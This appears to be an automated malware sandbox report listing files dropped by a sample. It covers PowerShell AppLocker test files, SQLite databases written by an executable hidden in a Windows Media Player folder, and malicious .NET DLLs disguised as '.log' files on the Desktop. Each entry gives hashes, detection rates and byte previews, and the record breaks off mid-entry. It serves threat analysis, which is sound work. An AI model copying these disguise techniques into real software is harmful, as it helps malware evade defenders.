                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vz2zdvrj.c3k.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w153r1fx.wsi.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wftkt1cn.zkl.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgg54dq3.tij.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0wygner.upf.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2zrndg0.10k.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3pcpltk.5nt.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykk1o0s5.dzl.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbpuamx3.z35.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdjok2i2.tbm.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsipebtv.255.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\beKOKyda4b

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):114688
                                                                                        Entropy (8bit):0.9746603542602881
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\it0cT1Y6lg

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):1.1358696453229276
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\plvQ342sa2

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.8180424350137764
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\rVbaFkDBOQ

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):25
                                                                                        Entropy (8bit):4.133660689688185
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:aqeM:aqX
                                                                                        MD5:324BC721EC0050C841E1F35FAD0F13EF
                                                                                        SHA1:AE66ECEEDA682C14228A092077E070DC27FC37C7
                                                                                        SHA-256:216B7D8C453E19F8B0B87ED3EAE157F5C7CF8BFF584897EC17A25FE8F725BD88
                                                                                        SHA-512:D2CA774ACCE4B6127D4678DF5C134C852BD38CC181286E119B6E8A71B02AFD481B7F83DC1275372716207428144DFD88E27D85F1C25BFCB9024A2E4E9FA82219
                                                                                        Malicious:false
                                                                                        Preview:FXkWvo3p3IcX2UWCOb4IkTjWr

                                                                                        C:\Users\user\AppData\Local\Temp\rWoD8PBVuG

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):40960
                                                                                        Entropy (8bit):0.8553638852307782
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\wyOpj72Hge

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):2.5793180405395284
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\AfaiVEic.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):294912
                                                                                        Entropy (8bit):6.010605469502259
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious, Browse
                                                                                        • Filename: aW6kSsgdvv.exe, Detection: malicious, Browse
                                                                                        • Filename: HMhdtzxEHf.exe, Detection: malicious, Browse
                                                                                        • Filename: kJrNOFEGbQ.exe, Detection: malicious, Browse
                                                                                        • Filename: lEwK4xROgV.exe, Detection: malicious, Browse
                                                                                        • Filename: zZ1Y43bxxV.exe, Detection: malicious, Browse
                                                                                        • Filename: VqGD18ELBM.exe, Detection: malicious, Browse
                                                                                        • Filename: updIMdPUj8.exe, Detection: malicious, Browse
                                                                                        • Filename: voed9G7p5s.exe, Detection: malicious, Browse
                                                                                        • Filename: f3I38kv.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                        C:\Users\user\Desktop\BargBgFj.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):5.645950918301459
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\BnpyIbbb.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22016
                                                                                        Entropy (8bit):5.41854385721431
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\BwYQnKCg.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):23552
                                                                                        Entropy (8bit):5.529329139831718
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\EEJGOfpT.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):41472
                                                                                        Entropy (8bit):5.6808219961645605
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\EVQZcBiW.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):70144
                                                                                        Entropy (8bit):5.909536568846014
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\FAtHPtxq.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):342528
                                                                                        Entropy (8bit):6.170134230759619
                                                                                        Encrypted:false
